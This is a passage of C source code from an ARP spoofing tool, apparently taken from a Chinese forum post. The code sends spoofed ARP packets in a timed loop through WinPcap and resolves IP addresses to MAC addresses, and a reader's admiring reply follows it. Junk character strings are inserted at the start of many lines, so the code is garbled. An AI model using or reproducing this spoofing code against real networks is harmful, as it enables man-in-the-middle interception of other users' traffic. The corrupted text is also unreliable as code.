    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
5 A8 Z% \6 Y, b1 b' S    {
      printf("Error sending the arp spoof packets!\n");
3 @9 Q0 N* b% W' d' I) B' E      return 0;
    }
+ T4 N7 V6 l7 L* k6 [+ V    Sleep(1000);
  }
  return 0;
5 K, _" P) S! ], u8 e# ?( F$ ~}
& I6 y8 j1 w# h; o
//
& h+ X# t" m7 D: O% u//功能：输入IP取得对应的MAC地址
* t& i5 S% T9 ]( Q8 R//
BOOL GetMACAddr(DWORD DestIP, char *pMAC)
% }, u) ?) X' _. l  |* k{
3 n/ j' \/ @( m2 x) Q; [  DWORD  dwRet;
$ I+ Y7 B1 u" {3 f3 R( m8 Z' W  ULONG  ulLen = 6, pulMac[2];
8 R7 r- k5 O; Z5 M8 @  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
  if(dwRet == NO_ERROR)
* g/ J$ H- j& n  {
4 y( _& _  q1 W& h) Q  [5 T8 v' J" h$ y    memcpy(pMAC, pulMac, 6);
( [3 R, ^; v2 G1 R0 m6 Q0 q    return TRUE;
  }
  else return FALSE;
}

wy617958197

大侠好厉害啊